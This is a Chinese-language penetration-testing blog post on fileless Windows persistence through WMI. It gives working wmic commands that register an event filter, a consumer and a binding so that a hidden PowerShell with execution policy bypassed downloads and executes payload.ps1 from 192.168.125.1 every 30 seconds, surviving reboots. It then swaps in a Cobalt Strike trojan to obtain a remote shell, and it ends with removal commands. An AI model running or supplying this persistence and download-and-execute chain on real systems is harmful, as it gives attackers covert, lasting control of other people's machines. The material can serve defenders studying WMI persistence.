WMIC实现无文件持久性控制

0x01 wmi+powershell

傀儡机执行:

功能:每隔30秒加载一次payload,重启仍然有效

wmic /NAMESPACE:"\rootsubscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="rootcimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 30 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"

wmic /NAMESPACE:"\rootsubscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23",CommandLineTemplate="powershell.exe -executionpolicy bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://192.168.125.1/payload.ps1')"

wmic /NAMESPACE:"\rootsubscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="BotFilter82"", Consumer="CommandLineEventConsumer.Name="BotConsumer23""

《WMIC实现无文件持久性控制》

渗透测试人员:

放一个payload.ps1到目录,并架设http服务

《WMIC实现无文件持久性控制》

《WMIC实现无文件持久性控制》

 

payload.ps1就是需要执行的内容,每过30秒请求并执行一次。

0x02 获取shell

需要对傀儡机进行操作时,可使用cobalstrike反弹一个shell

启动cobaltstrike

./teamserver 192.168.125.133 123

配置监听器

《WMIC实现无文件持久性控制》

 

生成木马

《WMIC实现无文件持久性控制》

将cc服务器上的payload.ps1内容替换为cobalstrike生成的木马

ok,成功上线。

《WMIC实现无文件持久性控制》

《WMIC实现无文件持久性控制》

清除

Get-WMIObject -Namespace rootSubscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose    

Get-WMIObject -Namespace rootSubscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose    

Get-WMIObject -Namespace rootSubscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

 

本文来自ringk3y,经授权后发布,本文观点不代表MottoIN立场,转载请联系原作者。

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code